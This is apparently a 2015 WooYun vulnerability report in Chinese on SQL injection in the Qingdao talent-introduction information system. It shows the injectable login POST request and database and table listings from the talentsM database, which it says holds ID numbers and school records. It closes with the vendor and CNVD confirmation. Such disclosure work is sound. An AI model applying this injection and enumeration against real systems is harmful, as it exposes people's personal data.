乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-09: 细节已通知厂商并且等待厂商处理中 2015-10-13: 厂商已经确认,细节仅向厂商公开 2015-10-23: 细节向核心白帽子及相关领域专家公开 2015-11-02: 细节向普通白帽子公开 2015-11-12: 细节向实习白帽子公开 2015-11-27: 细节向公众公开
RT
青岛市全市人才引进实名制信息系统:
http://**.**.**.**/index.jsp
注入:
POST /login.jsp HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 27Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/index.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=179DBDC2F22350035630D0BB80718CE7userid=ADMIN&password=ADMIN
这个站比蛋疼的地方就是里面记录了这几年青岛市人才引进实名制信息。
接收师范类大中专毕业生情况 驻青高校引进人才情况 引进博士或正高职称高层次人才明细 引进硕士或副高职称高层次人才明细 高层次人才服务情况明细 引进本科及以下层次人才明细表 引进人才基本信息表
数据库:
[*] Association[*] ciri[*] cmsplatform[*] distribution[*] gsl2[*] GSLOABBS[*] master[*] MesnacWork[*] model[*] msdb[*] qdeu[*] RemoteMeter[*] smartcard[*] sms[*] SNote[*] talentsM[*] TcpListener[*] tempdb[*] TM[*] ybc_message
talentsM:
+-------------------------------+| db_owner.rp_danwei || db_owner.rp_diqu || db_owner.rp_haier || db_owner.rp_id || db_owner.rp_leixing || db_owner.rp_xingzhi || db_owner.rp_zhicheng || db_owner.rp_zhuanye || db_owner.table_22_bd2013 || db_owner.table_22_bd_20131231 || db_owner.table_like || MAJORS || MD_MODULE || MD_USERRIGHTLIST || MD_USERS || RC_LEIBIE || RC_TYPE || TECH_DUTY || Table_10_BD || Table_10_CD || Table_10_LS || Table_11_BD || Table_11_CD || Table_11_LS || Table_12_BD || Table_12_CD || Table_12_LS || Table_13_BD || Table_13_CD || Table_13_LS || Table_14_BD || Table_14_CD || Table_14_LS || Table_15_BD || Table_15_CD || Table_15_LS || Table_16_BD || Table_16_CD || Table_16_LS || Table_17_BD || Table_17_CD || Table_17_LS || Table_18_BD || Table_18_LS || Table_19_BD || Table_19_LS || Table_1_BD || Table_1_CD || Table_1_LS || Table_20_BD || Table_20_LS || Table_21_BD || Table_21_LS || Table_22_BD_bak || Table_22_BD_bak || Table_22_BD_biyesheng || Table_22_BD_qingdao20131118 || Table_22_LS || Table_22_LXWJY_duibi || Table_22_Record || Table_2_BD || Table_2_CD || Table_2_LS || Table_3_BD || Table_3_CD || Table_3_LS || Table_4_BD || Table_4_CD || Table_4_LS || Table_5_BD || Table_5_CD || Table_5_LS || Table_6_BD || Table_6_CD || Table_6_LS || Table_7_BD || Table_7_LS || Table_8_BD || Table_8_CD || Table_8_LS || Table_9_BD || Table_9_LS || USER_DATA || dicdatas || dictypes || jtest || md_sys_cfg || rp_localschool || rp_table9_1keyan || rp_table9_2gaoxiao || rp_table9_3shengshu || rp_table9_4shizhi || rp_table9_5weisheng || sysdiagrams |+-------------------------------+
大量信息:
每年都会在这个系统录入许多人才信息,看了下今年的还没开始。
系统漏洞不算什么 关键是大量的人才信息 什么身份证号码 学校都在里面
危害等级:中
漏洞Rank:10
确认时间:2015-10-13 17:48
CNVD确认所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置.
暂无